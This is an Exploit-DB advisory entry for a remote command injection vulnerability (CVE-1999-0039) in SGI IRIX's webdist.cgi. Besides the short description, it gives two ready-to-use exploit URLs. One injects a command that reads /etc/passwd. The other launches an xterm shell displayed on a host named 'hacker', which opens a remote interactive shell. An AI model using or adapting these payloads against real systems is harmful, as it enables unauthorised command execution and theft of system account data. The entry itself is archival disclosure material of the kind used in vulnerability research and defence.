SGI IRIX <= 6.3 cgi-bin webdist.cgi Vulnerabilty

1997-05-06T00:00:00
ID EDB-ID:19299
Type exploitdb
Reporter anonymous
Modified 1997-05-06T00:00:00

Description

SGI IRIX 6.3 cgi-bin webdist.cgi Vulnerabilty. CVE-1999-0039. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/374/info


A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed with the privileges of the httpd daemon.

/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

or

http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh